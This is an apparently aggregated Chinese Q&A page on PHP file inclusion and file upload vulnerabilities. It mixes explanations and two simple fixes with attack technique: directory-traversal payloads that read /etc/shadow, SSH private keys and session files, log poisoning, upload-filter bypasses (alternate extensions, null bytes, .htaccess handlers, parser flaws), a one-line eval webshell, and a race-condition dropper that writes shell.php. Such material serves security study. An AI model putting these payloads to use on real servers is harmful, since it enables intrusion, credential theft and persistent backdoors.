php文件包含漏洞

⑴ 如何查找php文件包含漏洞的方法

找360或安全联盟检测接口， 免费的。
主要是查上传漏洞。可以网络下，够学习一段时间的。

⑵ php文件包含漏洞可造成的危害有哪些

假如你的 include 中包含 可变的参数，而且可悲外部修改，例如：

<?php
include("inc/".$_GET['file']);

这样的话，就会引发漏洞，用户可以构造任意参数来读取你的文件。

⑶ 是不是只有php才有文件包含漏洞

你好，这个是不一定的，有些文件看你写出来的有没有漏洞才是，所有的程序都不可能说没有漏洞，没有bug

⑷ 文件包含漏洞形成的原因是什么

导致系统漏洞的原因包括程序逻辑结构设计不合理，不严谨、编程人员程序设计错误以及目前为止硬件无法解决特定的问题：

1、编程人员在设计程序时，对程序逻辑结构设计不合理，不严谨，因此产生一处或者多处漏洞，正是由于这些漏洞，给病毒入侵用户电脑提供了入口。

2、编程人员的程序设计错误也是计算机系统漏洞产生的原因之一，受编程人员的能力、经验和当时安全技术所限，在程序中难免会有不足之处，轻则影响程序效率，重则导致非授权用户的权限提升，这种类型的漏洞最典型的是缓冲区溢出漏洞，它也是被黑客利用得最多的一种类型的漏洞。

3、由于目前硬件无法解决特定的问题，使编程人员只得通过软件设计来表现出硬件功能而产生的漏洞，也会让黑客长驱直入，攻击用户的电脑。

(4)php文件包含漏洞扩展阅读：

漏洞的影响范围很广，包括系统本身及其支持软件、网络客户端和服务器软件、网络路由器和安全防火墙。

在不同类型的硬件和软件设备、相同设备的不同版本、不同的系统由不同的设备组成，以及同一系统在不同的设置下，都会存在不同的安全漏洞。

因此，随着时间的推移，旧的系统漏洞会消失，新的系统漏洞会继续出现。系统中的漏洞也依然存在。

⑸ 利用本地文件包含漏洞可以执行下面哪些操作

服务器通过php的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可去包含一个恶意文件，而我们可以构造这个恶意文件来达到邪恶的目的。几乎所有的 cgi程序都有这样的 bug，只是具体的表现方式不一样罢了。

⑹ PHP 网络开发详解之远程文件包含漏洞

以下代码（Code）实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。
复制代码
代码如下:
<?php
$file_name
=
$_GET["filename"];
//获得当前文件名
include("$file_name
");
//包含文件
//一些其他操作
?>
这时，通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能。例如，通过在浏览器上访问http://localhost/test.php?filename=myinc.php就可以在代码（Code）中包含并执行myinc.php文件。
由于上面的代码（Code）没有进行任何错误处理，在浏览器上不加参数运行，所以将得到以下运行结果。
Warning:
include(.php)
[function.include]:
failed
to
open
stream:
No
such
file
or
directory
in
C:\Program
Files\xampp\htdocs\Bugs\test6.php
on
line
3
Warning:
include()
[function.include]:
Failed
opening
'.php'
for
inclusion
(include_path='.;C:\Program
Files\xampp\php\pear\')
in
C:\Program
Files\xampp\htdocs\Bugs\test6.php
on
line
3
访问者通过读取这段错误信息，可以得知当前的操作是一个文件包含操作。这时，可以在自己的服务器上放置一个相应的脚本代码。需要注意的是PHP在获取远程文件时获得的是远程服务器的最终输出结果，而不是文件本身。该脚本代码位于192.168.0.1服务器上，文件名为hello.txt，脚本代码（Code）如下所示。
复制代码
代码如下:
<?php
echo
"hello
world!";
?>
这时，通过在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以运行hello.txt中的脚本了。
为了解决这个问题，一种方式是完善代码的错误信息，使访问者无法知道当前脚本正在包含参数中指定的文件。修改后的代码（Code）如下所示。
复制代码
代码如下:
<?php
$file_name
=
$_GET["filename"];
//获得当前文件名
if(!@include("$file_name.php"))
//包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>
修改后，如果在被包含的文件无法找到时将出现“页面在浏览过程中出现错误”的错误信息，访问者将无法获得当前页面的具体操作信息。
第二种方式可以更加有效地防止远程文件包含攻击。方式是替换地址栏参数中的斜线“/”。这样，在地址栏参数中输入远程文件地址时，代码将无法正确地获得参数。修改后的代码（Code）如下所示。
复制代码
代码如下:
<?php
$file_name
=
str_replace('/',
'',
$_GET["filename"]);
//获得当前文件名
if(!@include("$file_name.php"))
//包含文件
{
die("页面在浏览过程中出现错误");
}
//一些其他操作
?>
这样，在浏览器中访问http://localhost/test.php?filename=http://192.168.0.1/hello.txt
时，实际上PHP代码（Code）获得的包含文件名称是http:192.168.0.1bugstest6_test。页面将不会包含远程文件，并显示相应的错误信息。

⑺ 文件上传漏洞有哪些挖掘思路

文件上传漏洞作为获取服务器权限最快的方式，虽然相关资料很多，但很多人对上传校验方式、如何针对性绕过检测、哪种上传和解析的场景会产生危害等还是比较模糊。本文作一些阐述，然后补充一些除了上传webshell的其他非常规挖掘姿势，包括XSS、重定向、Dos、CSRF等等。
1、基础知识：
要深入了解文件上传，必须了解上传属性、常见文件的结构、图形处理函数等内容。
1） 报文特点：
观察文件上传报文的特点：
Header中Content-Type特征有二：
1.multipart/form-data（form表单的enctype属性，规定为二进制数据）
2.boundary字符串（作用为分隔符，以区分POST数据）
POST内容特征有五：
1.Content-Disposition：form-data
2. name：input表单名
3.filename：文件名
4.Content-Type：定义文件的类型和网页的编码，决定浏览器将以什么形式、什么编码读取这个文件；
5.boundary：Content-Type的值前面加了两个---

2） 常见校验规则
现存常用的上传校验规则无非下面几类：
1.客户端javascript校验（后缀名）
2.文件头content-type字段校验（image/gif）：附带参数
4.后缀名黑/白名单校验：扩展名
5.文件内容头校验：GIF89a
6.文件内容校验：文件信息，二次渲染
7.自定义正则校验
3）一个澄清
文件上传和文件解析是两个过程，即使我们上传的是php文件，但解析为图片，访问php文件会显示“图片无法显示”；或者我们上传的是jpg文件，但里面混有shell脚本，若被解析为php文件也会执行；又或者上传处没法绕过检测，只能上传jpg文件，但在其他功能处存在文件包含等功能，仍可执行成功。
还是回到安全的本质，上传是“输入”，那文件解析就是“输出”，任何漏洞挖掘都需要结合输入+输出。

2、绕过技巧：
这里汇总一些实战中较常用的绕过技巧：
1）后缀名黑名单
以下替换后缀也可以解析为shell：
php：.phtml,.phpt,.php3,.php3p
asp：.aspx，asmx，ashx，web.config
perl:.pl,.pm,.cgi,.lib
jsp:.jspx,.jsw,.jsv,.jspf
Coldfusion:.cfm,.cfml,.cfc,.dbm
另外可以配合操作系统的文件命名规则：
.php.,.php空格，.php:1.jpg,.php::$DATA等
这些后缀的文件会被windows系统自动去掉不符合规则符号后面的内容，从而只留下.php。
2）后缀名白名单
除了结合各种服务器解析特性，较常用的是Null Byte Injection空字节注入，插入空字节值的原因是某些应用程序服务器脚本语言使用c/c++库来检查文件名和内容。在C/C ++中，一行以/00结尾或称为NullByte。因此，只要解释器在字符串的末尾看到一个空字节，就会停止读取，认为它已经到达字符串的末尾。
如，我们将要上传的Happy.jpg的名称更改为Happy.phpA.jpg，然后上传文件，在Burp中捕获请求，切换到Hex视图。在字符串视图中找到文件名。查看相应的Hex表，并将41（'A'）替换为00（为空字节）。结果字符串变为Happy.php（空）.jpeg。由于php解释器在内部使用C语言库，它将停止读取Happy.php后的文件名，文件将保存为Happy.php。
另一种绕过白名单的方法是使用双后缀：shell.php.jpg。

⑻ php文件包含漏洞可能造成的危害有哪些

在接下来的内容中会以代码样本作为例子，来给大家介绍各种奇葩猥琐的利用姿势。
0x01 普通本地文件包含

1

<?php
include("inc/"

. $_GET['file']);
?>

包含同目录下的文件：
?file=.htaccess
目录遍历：
?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db
（linux中这两个文件储存着所有文件的路径，需要root权限）
包含错误日志： ?file=../../../../../../../../../var/log/apache/error.log （试试把UA设置为“”来使payload进入日志）
获取web目录或者其他配置文件：
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf
（更多→http://wiki.apache.org/httpd/DistrosDefaultLayout）
包含上传的附件：
?file=../attachment/media/xxx.file
读取session文件：
?file=../../../../../../tmp/sess_tnrdo9ub2tsrntv0pdir1no7
（session文件一般在/tmp目录下，格式为sess_[your phpsessid value]，有时候也有可能在/var/lib/php5之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值，也许你能够获得一个shell）
如果拥有root权限还可以试试读这些东西：
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件标识符)
/proc/mounts
/proc/config.gz
如果有phpinfo可以包含临时文件：
参见http://hi..com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

⑼ 文件上传漏洞的类型有哪些

1、 前端检测绕过
有的站点只在前端对文件的类型有所限制，我们只需用bp抓包然后修改文件后缀名就能绕过这种检测。
2、 文件头检测绕过
有的站点使用文件头来检测文件的类型，这种检测可以在shell前加入相应的字节一绕过检测，几种常见的文件类型的头字节如下：

3、 后缀检测绕过
部分服务器仅根据文件后缀、上传时的信息或者文件头来判断文件类型，此时可以绕过。php由于历史的原因，部分解释器可能支持符合正则/ph(p[2-7]?|t(ml)?)/的后缀，如php/php5/pht/phtml/shtml/pwml/phtm等。如果后端对文件名进行了过滤，可以尝试双写文件名，比如1.pphphp。
4、 系统命名绕过
在windows系统中，上传不符合windwos命名规则的文件名会被windows系统自动去掉不符合规则符号后面的内容，例如：test.asp.、test.asp(空格)、test.php:1.jpg、test.php:: D A T A 、 t e s t . p h p : : DATA、test.php:: DATA、test.php::DATA…这些文件上传到服务器端之后都会变成test.php
在linux系统下，可以尝试上传文件后缀名为大小写混用的Php文件。
5、 文件包含绕过
在文件包含的时候，为了灵活包含文件，将被包含文件设置为变量，通过动态变量来引入需要包含的文件，用户可以对变量的值进行控制，而服务器端未对变量进行合理的校验，这样就导致所包含的文件有可能存在恶意代码。比如1.php
<?php $file=$_GET[‘file’]; include($file); ?>
这个程序就包含了一个文件，我们在1.txt文件中写入
<?php phpinfo(); ?>
然后将这个文件包含在1.php中1.php?file=1.txt这样
<?php phpinfo(); ?>就成功写入1.php这个文件当中，我们访问1.php这个文件的时候就能出现php信息那个页面。利用这个漏洞我们就可以进行文件上传，我们只需包含一个一句话木马内容的txt就能用菜刀连接，这样就成功执行了文件上传。
6、 解析漏洞绕过
目录解析：在网站中建立名称为*.asp、.asa格式的文件夹时，其文件夹下面的文件都会被当做asp执行。
文件解析：当文件名为.asp;1.jpg时，也会被当做asp执行
Apache解析漏洞：Apache在解析文件时，是从右往左，如果遇到不认识的扩展名时，就会继续向左判断，例如1.php.rar就会被当做
php解析。
IIS 7.0/IIS 7.5/Nginx<0.8.3畸形文件解析漏洞，当访问http://xxx.com/1.jpg/1.php时，此时1.php不存在，就会将1.jpg当做php文件去执行，所以如果存在该漏洞，将php木马后缀改成jpg然后访问1.jpg/1.php然后1.jpg就会被当成1.php来执行。
.htaccess，该文件里面的代码如下：
<FilesMatch “1”>
SetHandler application/x-httpd-php

这段代码的意思就是文件名包含”1”这个这个字符串就会被当成php文件来处理。但是值得注意的是上传.htaccess必须是网站根路径。
7、 文件截断绕过
00截断：由于00代表结束符，所以会把00后面的所有字符删除。
能利用这个漏洞的前提是，php版本要小于5.3.4，magic_quotes_gpc需要为OFF状态。我们用bp进行拦包之后，需要send to repeater,然后在hex中，在php后面添加00
8、 竞争条件攻击
一些网站上传文件逻辑上是允许上传任意文件的，然后检查上传文件的内容是否包含webshell脚本，如果包含则删除该文件，这里存在的问题是文件上传成功之后和删除文件之间存在一个短的时间差，攻击者就可以利用这个时间差来上传漏洞攻击。攻击者先上传一个webshell脚本1.php内容如下：
<?php fputs(fopen(‘../shell.php’,’w’),’<?php @eval($_POST[a]) ?>’); ?>
代码内容就是生成一个新的webshell，shell.php，那么当1.php上传成功之后，我们快速访问这个文件，这时就会在服务器端当前目录下自动生成shell.php，这时就利用时间差完成了webshell的上传。